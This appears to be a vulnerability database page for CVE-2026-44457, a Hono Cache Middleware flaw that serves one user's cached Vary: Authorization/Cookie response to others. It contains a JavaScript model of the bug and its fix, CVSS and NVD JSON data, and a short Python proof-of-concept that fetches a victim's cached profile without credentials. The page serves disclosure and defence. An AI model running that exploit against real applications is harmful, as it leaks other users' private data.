Security Vulnerability Report
CVE-2026-44457 CVSS 5.3 MEDIUM

Published: 2026-05-13 16:16:58
Last Modified: 2026-05-13 18:34:01

Description

Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.18, Cache Middleware does not skip caching for responses that declare per-user variance via Vary: Authorization or Vary: Cookie. As a result, a response cached for one authenticated user may be served to subsequent requests from different users. This vulnerability is fixed in 4.12.18.
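The following JavaScript is an added illustration, not Hono's own code and not the fix as shipped in 4.12.18: it models a URL-keyed response cache in which honorVary=false stores every response (so the second user is handed the first user's profile), while honorVary=true declines to cache any response whose Vary header names Authorization or Cookie. The handler, user names and URL are constructed for this example.

```javascript
// Added example (not Hono's code): a minimal model of a URL-keyed response
// cache, showing the CVE-2026-44457 bug class and the hardened check.

// Parse a Vary header value into a set of lower-cased field names.
function parseVary(value) {
  if (!value) return new Set();
  return new Set(
    value.split(',').map((v) => v.trim().toLowerCase()).filter(Boolean),
  );
}

// Headers whose presence in Vary marks a response as per-user.
const PER_USER_VARY = ['authorization', 'cookie'];

// Hardened check: a response may be served from a URL-keyed cache only if
// it does not vary on a per-user header (Vary: * is never shareable).
function isShareable(headers) {
  const vary = parseVary(headers.vary);
  if (vary.has('*')) return false;
  return !PER_USER_VARY.some((name) => vary.has(name));
}

// Tiny cache keyed by URL only. honorVary=false models the vulnerable
// behaviour (store everything); honorVary=true models the fixed behaviour.
function makeCache(honorVary) {
  const store = new Map();
  return (url, req, handler) => {
    if (store.has(url)) return store.get(url);
    const res = handler(req);
    if (!honorVary || isShareable(res.headers)) store.set(url, res);
    return res;
  };
}

// Constructed origin handler: the body depends on the caller's credential,
// and the response declares that via Vary: Authorization.
function profileHandler(req) {
  const user = req.headers.authorization || 'anonymous';
  return { status: 200, headers: { vary: 'Authorization' }, body: `profile:${user}` };
}

// Two different users request the same URL through the cache; returns the
// bodies each of them received.
function simulate(honorVary) {
  const cached = makeCache(honorVary);
  const url = 'https://app.invalid/api/profile';
  const a = cached(url, { headers: { authorization: 'alice' } }, profileHandler);
  const b = cached(url, { headers: { authorization: 'bob' } }, profileHandler);
  return [a.body, b.body];
}
```

simulate(false) returns ['profile:alice', 'profile:alice'], i.e. bob receives alice's cached profile; simulate(true) returns ['profile:alice', 'profile:bob'] because the per-user response is never stored.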

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:* - VULNERABLE
Hono < 4.12.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2026-44457: Hono Cache Middleware Information Leakage
# This script demonstrates how an attacker can retrieve cached data of another user.

target_url = "http://vulnerable-hono-app.com/api/profile"


def exploit():
    # Step 1: Simulate the scenario where a victim's data is cached.
    # In a real attack, this happens naturally when a victim browses the site.
    # Here we assume the cache is already populated by a previous request from a victim.
    print("[+] Assuming victim data is already cached...")

    # Step 2: Attacker sends a request without authentication headers.
    # The application should return 401 Unauthorized.
    # However, due to the vulnerability, it returns the cached 200 OK from the victim.
    headers = {
        # No Authorization or Cookie headers
        "User-Agent": "Attacker-Scanner/1.0"
    }
    print(f"[*] Sending unauthenticated request to {target_url}")
    response = requests.get(target_url, headers=headers)

    # Step 3: Check if we received the victim's data
    if response.status_code == 200:
        print("[+] Exploit successful! Received cached data:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")


if __name__ == "__main__":
    exploit()

References

https://github.com/honojs/hono/security/advisories/GHSA-p77w-8qqv-26rm (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44457",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T16:16:57.700",
    "lastModified": "2026-05-13T18:34:01.020",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.18, Cache Middleware does not skip caching for responses that declare per-user variance via Vary: Authorization or Vary: Cookie. As a result, a response cached for one authenticated user may be served to subsequent requests from different users. This vulnerability is fixed in 4.12.18."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-524"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "4.12.18",
                "matchCriteriaId": "5AB1A6FC-8475-4A23-9E63-46F3E6C5D264"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/honojs/hono/security/advisories/GHSA-p77w-8qqv-26rm",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}